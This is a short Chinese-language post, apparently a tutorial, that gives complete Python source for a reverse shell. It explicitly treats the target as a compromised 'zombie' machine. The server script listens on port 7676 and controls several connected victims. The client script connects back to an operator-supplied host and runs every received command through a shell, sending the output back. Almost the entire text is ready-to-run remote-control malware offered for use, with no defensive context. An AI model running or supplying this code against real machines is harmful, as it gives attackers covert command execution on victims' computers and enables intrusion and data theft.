反弹shell ,以肉鸡为客户端,本机为服务端。
调用subprocess模块popen 函数,此函数会新创建一个子进程,用于shell会话
python 3.5
server端代码
#!/usr/bin/env python3 # -*- coding: utf-8 -*- import socket import threading clientList = [] #连接的客户端列表 curClient = None #当前的客户端 quitThread = False #是否退出线程 lock = threading.Lock() def shell_ctrl(socket,addr): while True: com = input(str(addr[0]) + ':~#') if com == '!ch': select_client() return if com == '!q': quitThread = True print('-----------------------* Connection has ended *--------------------------') exit(0) socket.send(com.encode('utf-8')) data = socket.recv(1024) print(data.decode('utf-8')) def select_client(): global clientList global curClient print('--------------* The current is connected to the client: *----------------') for i in range(len(clientList)): print('[%i]-> %s' % (i, str(clientList[i][1][0]))) print('Please select a client!') while True: num = input('client num:') if int(num) >= len(clientList): print('Please input a correct num!') continue else: break curClient = clientList[int(num)] print('=' * 80) print(' ' * 20 + 'Client Shell from addr:', curClient[1][0]) print('=' * 80) def wait_connect(sk): global clientList while not quitThread: if len(clientList) == 0: print('Waiting for the connection......') sock, addr = sk.accept() print('New client %s is connection!' % (addr[0])) lock.acquire() clientList.append((sock, addr)) lock.release() def main(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(('0.0.0.0',7676)) s.listen(1024) t = threading.Thread(target=wait_connect,args=(s,)) t.start() while True: if len(clientList) > 0: select_client() # 选择一个客户端 shell_ctrl(curClient[0],curClient[1]) #处理shell命令 if __name__ == '__main__': main()
客户端代码
#!/usr/bin/env python3 # -*- coding: utf-8 -*- import socket import subprocess import argparse import sys import time import threading def connectHost(ht,pt): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((ht,int(pt))) while True: data = sock.recv(1024) data = data.decode('utf-8') comRst = subprocess.Popen(data,shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) m_stdout, m_stderr = comRst.communicate() sock.send(m_stdout.decode(sys.getfilesystemencoding()).encode('utf-8')) time.sleep(1) sock.close() def main(): parser = argparse.ArgumentParser() #命令行参数解析对象 parser.add_argument('-H',dest='hostName',help='Host Name') parser.add_argument('-p',dest='conPort',help='Host Port') args = parser.parse_args() #解析命令行参数 host = args.hostName port = args.conPort if host == None and port == None: print(parser.parse_args(['-h'])) exit(0) connectHost(host,port) #连接到控制端 if __name__ == '__main__': main()